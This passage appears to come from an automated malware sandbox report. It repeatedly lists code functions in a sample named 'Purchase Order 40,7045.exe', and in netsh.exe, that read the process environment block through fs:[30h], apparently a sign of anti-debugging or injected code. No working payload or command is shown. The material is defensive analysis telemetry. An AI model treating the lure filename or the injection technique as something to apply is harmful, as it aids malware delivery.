Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012A8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121B73D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121B73D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C8F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01277794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01277794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01277794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01208794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012337F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012AFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01228E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01207E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01207E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01207E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01207E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01207E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01207E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012746A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012216E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012076E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01238EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012AFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012236CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C8ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03942397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0394B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039CD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03921B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03921B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03944BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03944BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03944BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039953CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039953CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039C23E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039C23E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039C23E3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0391F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0391DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03943B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03943B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0391DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0394D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0394D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0392AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0392AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0394FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03942ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03942AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03915210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03915210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03915210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03915210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0391AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0391AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039DAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039DAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03933A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03928A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03954A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03954A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039DEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039A4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03919240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03919240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03919240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03919240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0395927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039CB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039CB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03942990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0394A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov ecx, dword ptr fs:[00000030h]
